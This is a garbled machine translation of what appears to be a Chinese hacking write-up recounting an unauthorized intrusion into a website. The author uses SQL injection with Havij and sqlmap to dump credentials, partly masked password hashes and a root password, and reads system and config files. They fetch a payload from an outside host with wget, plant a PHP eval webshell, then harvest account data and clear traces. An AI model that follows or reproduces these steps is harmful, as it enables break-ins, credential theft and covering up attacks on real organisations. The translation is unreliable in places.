0x00 Information Collection
I accidentally discovered an injection link. I don't know how to find it. It's not a scan.
Http://www.bkjia.com/xxxxxx? Id = 12
Google finds the background
Site: f4ck.edu. cninurl: admin
Http://www.bkjia.com/xxx. php
0x01 account password acquisition
Use the injection point first.
Drop into Havij and run out of Database
Run the database account password
An error occurred while cracking the admin password,
Then crack other users and obtain the 123xxxxx password. After logging in, there is no usable location, as shown in figure
Check other super administrators, and the password is not cracked successfully. One of the five shows that the password is cracked successfully, but you need to purchase
In fact, even if you purchase it, it will prompt that it cannot be cracked. I wiped it.
Continue. See mysql
Read the account password information and find phpmyadmin
First read the user password information of mysql
Data
Found:
User = xxx
Data
Data
Data
Data
Data
Found:
Found:
Found:
Found:
Found:
Password = * 3A3DAA719C86DA543FF1A9E27DB6E59xxxxxxxxx
User = pku_xxx
Password = * 3EDC2D4C98204DC580FCE638B8B3FA7xxxxxxxxx
User = root
Password = * EF9C0D7D80D1B158F3958176F869AAC9xxxxxxxx
When you check the root password, you are prompted to purchase it again. When you want to purchase it, you are prompted that it cannot be decrypted. Fuck.
0x02 battle phpmyadmin
No hope to transfer shell to the backend.
Add phpmyadmin after the website
If you lose several frequently used account passwords, no results will be returned. Let's look at the function of reading the file.
To read the content of the/etc/passwd file.
G-7
After that is to see can know the default configuration file, according to the server information G-8, Judge is Apache after entering
Default installation directory, default configuration file,
Read/etc/issue to get the operating system Ubuntu10.10 \ n \ l
Failed to read/usr/local/apache/conf/httpd. conf
Failed to read/usr/local/apache/conf/httpd. conf
The tool prompts Iamidle .....
Then I continued to guess the directory. The phpmyadmin path was not found. This phpmyadmin seems a bit strange.
Then Google
Site: www.2cto.com warning:
Site: www.2cto.com error:
Not even. And then fight for the character.
0x03 xampp found
User
Listen to the first love song and continue.
Suddenly, the phpmyadmin login interface contains
Then search for the xampp default installation information G-9
Xamppuser
F.
File/Directory
Purpose
/Opt/lampp/bin/
/Opt/lampp/htdocs/
/Opt/lampp/etc/httpd. con
F/opt/lampp/etc/my. cnf
/Opt/lampp/etc/php. ini
/Opt/lampp/etc/proftpd. c
Onf
/Opt/lampp/phpmyadmin/co
Nfig. inc. php
TheXAMPPcommandshome./opt/lampp/bin/mysqlcallsfor
ExampletheMySQLmonitor.
TheApacheDocumentRootdirectory.
TheApacheconfigurationfile.
TheMySQLconfigurationfile.
ThePHPconfigurationfile.
TheProFTPDconfigurationfile. (since0.9.5)
ThephpMyAdminconfigurationfile.
Read files
Read/opt/lampp/phpmyadmin/config. inc. php
Get information G-10
$ Cfg ['servers'] [$ I] ['user']
= 'Root ';
$ Cfg ['servers'] [$ I] ['Password']
= '91xxx ';
But its highlight is commentskey ..
Decisively connect phpmyadmin, and then I will wipe it out. The input does not respond. What is this.
Then read the file to see if the configuration file can be read.
Read/opt/lampp/htdocs/index. php
Find the configuration file,
G-11
60th pages 633 pages
Continue reading/opt/lampp/htdocs/inc/conn. php
No password.
After that, you can write a trojan file, but pangolin is not written.
Itsaidthetargetmustsetmagic_quotes_gpctooff
Execute database query statements
Select ''export outfile'/opt/lampp/htdocs/fuck. php'
Failed
0x04 pick up Sqlmap
Then I think of sqlmap, which plays a shell.
Command: sqlmap. py-u "http://www.bkjia.com/xxx. php? Id = 12 "-- OS-shell
Enter the web path/opt/lampp/htdocs/and then pop up the shell, G-12
View whoami
G-13
Lscat commands such as cdvi cannot be executed.
The command is successful if ls/is input during the column directory.
The wget command can be used later, but it is obviously mentally retarded. The amount of wgethttp: // fuck. uk/a. php can be directly used ..
Then wget
Cata.txt
Result:
Http://fuck.uk/a.txt
After that, we found that we could not rename the file. After trying, we could not decompress the file wget. .. Actually cp
You can directly execute cpa.txt a. php. Connection with kitchen knife, failed .. Fuck ....
Then I read the next sentence.
If php Sets
And mv is
Short_open_tag is open.
After wget again
G-14
?>
So it is best to use
Eval ($ _ request [fuck])?>
Kitchen Knife connection G-15
OK... do not do it first.
0x05 Sensitive Information Collection
Search various account and password information and clear traces
Suggestion
No suggestion